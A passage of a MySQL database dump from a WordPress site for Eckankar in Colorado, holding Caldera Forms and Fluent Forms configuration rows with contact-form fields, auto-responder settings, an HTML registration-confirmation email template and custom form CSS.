normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this email, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(46,'CF609054f5cb2a8','revision','a:16:{s:4:\"name\";s:9:\"Test Form\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:9:\"hide_form\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"2:3\";s:11:\"fld_2758980\";s:3:\"3:1\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:17:\"12|4:4:4|12|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:69:\"<h2>Your Details</h2>\n<p>Let us know how to get back to you.</p>\n<hr>\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:8:\"required\";s:1:\"1\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:8:\"required\";s:1:\"1\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:8:\"required\";s:1:\"1\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_2758980\";a:7:{s:2:\"ID\";s:11:\"fld_2758980\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:7:\"Message\";s:4:\"slug\";s:7:\"message\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:92:\"<h2>How can we help?</h2>\n<p>Feel free to ask a question or simply leave a comment.</p>\n<hr>\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:8:\"required\";s:1:\"1\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";s:1:\"7\";s:7:\"default\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:4:{s:2:\"ID\";s:11:\"fp_17689566\";s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:6:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:155:\"Hi %recipient_name%.\nThanks for your email.\nWe\'ll get back to you as soon as possible!\nHere\'s a summary of your message:\n------------------------\n{summary}\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:1:{s:9:\"on_insert\";i:1;}s:2:\"ID\";s:15:\"CF609054f5cb2a8\";s:11:\"check_honey\";i:1;s:8:\"template\";s:20:\"starter_contact_form\";}'),(47,'CF609054f5cb2a8','primary','a:22:{s:2:\"ID\";s:15:\"CF609054f5cb2a8\";s:13:\"_last_updated\";s:31:\"Mon, 03 May 2021 19:55:35 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:9:\"Test Form\";s:10:\"scroll_top\";i:0;s:7:\"success\";s:51:\"Form has been successfully submitted. Thank you.			\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"2:3\";s:11:\"fld_2758980\";s:3:\"3:1\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:17:\"12|4:4:4|12|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:69:\"<h2>Your Details</h2>\n<p>Let us know how to get back to you.</p>\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_2758980\";a:7:{s:2:\"ID\";s:11:\"fld_2758980\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:7:\"Message\";s:4:\"slug\";s:7:\"message\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:92:\"<h2>How can we help?</h2>\n<p>Feel free to ask a question or simply leave a comment.</p>\n<hr>\";}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:9:\"Test Form\";s:13:\"email_message\";s:9:\"{summary}\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:0;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:155:\"Hi %recipient_name%.\nThanks for your email.\nWe\'ll get back to you as soon as possible!\nHere\'s a summary of your message:\n------------------------\n{summary}\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}');
/*!40000 ALTER TABLE `wpcl_cf_forms` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_cf_forms` with 18 row(s)
--

--
-- Table structure for table `wpcl_fluentform_form_meta`
--

DROP TABLE IF EXISTS `wpcl_fluentform_form_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_fluentform_form_meta` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(10) unsigned DEFAULT NULL,
  `meta_key` varchar(255) NOT NULL,
  `value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=39 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_fluentform_form_meta`
--

LOCK TABLES `wpcl_fluentform_form_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_fluentform_form_meta` DISABLE KEYS */;
INSERT INTO `wpcl_fluentform_form_meta` VALUES (1,1,'template_name','basic_contact_form'),(2,1,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"Thank you for your message. We will get in touch with you shortly\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"selectedDays\":[\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"],\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"cssClassName\":\"\",\"asteriskPlacement\":\"asterisk-right\"},\"delete_entry_on_submission\":\"no\",\"appendSurveyResult\":{\"enabled\":false,\"showLabel\":false,\"showCount\":false}}'),(3,1,'advancedValidationSettings','{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":\"\",\"operator\":\"=\",\"value\":\"\"}],\"error_message\":\"\",\"validation_type\":\"fail_on_condition_met\"}'),(4,1,'double_optin_settings','{\"status\":\"no\",\"confirmation_message\":\"Please check your email inbox to confirm this submission\",\"email_body_type\":\"global\",\"email_subject\":\"Please confirm your form submission\",\"email_body\":\"<h2>Please Confirm Your Submission</h2><p>&nbsp;</p><p style=\"text-align: center;\"><a style=\"color: #ffffff; background-color: #454545; font-size: 16px; border-radius: 5px; text-decoration: none; font-weight: normal; font-style: normal; padding: 0.8rem 1rem; border-color: #0072ff;\" href=\"#confirmation_url#\">Confirm Submission</a></p><p>&nbsp;</p><p>If you received this email by mistake, simply delete it. Your form submission won\'t proceed if you don\'t click the confirmation link above.</p>\",\"email_field\":\"\",\"skip_if_logged_in\":\"yes\",\"skip_if_fc_subscribed\":\"no\"}'),(5,2,'template_name','inline_subscription'),(6,2,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"Thank you for your message. We will get in touch with you shortly\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"asteriskPlacement\":\"asterisk-right\"}}'),(7,2,'notifications','{\"name\":\"Admin Notification Email\",\"sendTo\":{\"type\":\"email\",\"email\":\"{wp.admin_email}\",\"field\":\"email\",\"routing\":[{\"email\":null,\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"[{inputs.names}] New Form Submission\",\"message\":\"<p>{all_data}<\\/p> <p>This form submitted at: {embed_post.permalink}<\\/p>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":false,\"email_template\":\"\"}'),(8,2,'step_data_persistency_status','no'),(9,2,'_primary_email_field','email'),(28,5,'_custom_form_css','form.fluent_form_5,\nform.fluent_form_5 button,\nform.fluent_form_5 input,\nform.fluent_form_5 textarea,\nform.fluent_form_5 label,\nform.fluent_form_5 select {\n	font-family: Open Sans;\n	color: #333333;\n}\n/* background color-wrapper */\nform.fluent_form_FF_ID {\n	background-color: #F2F2F2;\n	padding: 40px 50px 20px 50px;\n	border-radius: 5px;\n	box-shadow: rgba(50, 50, 93, 0.25) 0px 50px 100px -20px, rgba(0, 0, 0, 0.3) 0px 30px 60px -30px, rgba(10, 37, 64, 0.35) 0px -2px 6px 0px inset;\n\n}\n.fluentform .ff-el-input--label label {\n   font-size: 18px;\n}\n/* changes Google Privacy message background to frame color */\n.fluentform .ff-el-group {\n  margin-bottom: 20px;\n  background-color: #f2f2f2;\n  padding: 0px;\n  font-size: 16px;\n}\n/* removes border and box shadow from online thank you message */\n.ff-message-success {\n  border: none !important;\n  box-shadow: none !important;\n  margin-top: 10px;\n  padding: 15px;\n  position: relative;\n}\n\n'),(26,5,'template_name','blank_form'),(27,5,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"<div style=\\\"text-align: center; width: 80%; margin: auto; padding-top: 80px; padding-bottom: 100px; background-color: #fff;\\nborder-radius: 5px;\\\"><span style=\\\"font-size: 38pt;\\\"><span style=\\\"color: #1d5791;\\\"><strong>Thank You!<\\/strong><\\/span><\\/span>\\n<p>&nbsp;<\\/p>\\n<p><span style=\\\"font-size: 18pt;\\\">We appreciate your inquiry.<br \\/>You will be contacted soon regarding your submission.<\\/span><\\/p>\\n<\\/div>\",\"customPage\":null,\"samePageFormBehavior\":\"hide_form\",\"customUrl\":null},\"restrictions\":{\"limitNumberOfEntries\":{\"enabled\":false,\"numberOfEntries\":null,\"period\":\"total\",\"limitReachedMsg\":\"Maximum number of entries exceeded.\"},\"scheduleForm\":{\"enabled\":false,\"start\":null,\"end\":null,\"selectedDays\":[\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"],\"pendingMsg\":\"Form submission is not started yet.\",\"expiredMsg\":\"Form submission is now closed.\"},\"requireLogin\":{\"enabled\":false,\"requireLoginMsg\":\"You must be logged in to submit the form.\"},\"denyEmptySubmission\":{\"enabled\":false,\"message\":\"Sorry, you cannot submit an empty form. Let\'s hear what you wanna say.\"}},\"layout\":{\"labelPlacement\":\"top\",\"helpMessagePlacement\":\"with_label\",\"errorMessagePlacement\":\"inline\",\"cssClassName\":\"\",\"asteriskPlacement\":\"asterisk-right\"},\"delete_entry_on_submission\":\"no\",\"appendSurveyResult\":{\"enabled\":false,\"showLabel\":false,\"showCount\":false}}'),(25,5,'_primary_email_field','email'),(15,4,'notifications','{\"name\":\"Admin Notification Email\",\"sendTo\":{\"type\":\"email\",\"email\":\"{wp.admin_email}\",\"field\":\"email\",\"routing\":[{\"email\":null,\"field\":null,\"operator\":\"=\",\"value\":null}]},\"fromName\":\"\",\"fromEmail\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"subject\":\"[{inputs.names}] New Form Submission\",\"message\":\"<p>{all_data}<\\/p>\\n<p>This form submitted at: {embed_post.permalink}<\\/p>\",\"conditionals\":{\"status\":false,\"type\":\"all\",\"conditions\":[{\"field\":null,\"operator\":\"=\",\"value\":null}]},\"enabled\":false,\"email_template\":\"\"}'),(16,4,'_primary_email_field','email'),(17,4,'_total_views','18'),(18,4,'template_name','blank_form'),(19,4,'formSettings','{\"confirmation\":{\"redirectTo\":\"samePage\",\"messageToShow\":\"<div style=\\\"text-align: center; width: 80%; margin: auto; padding-top: 80px; 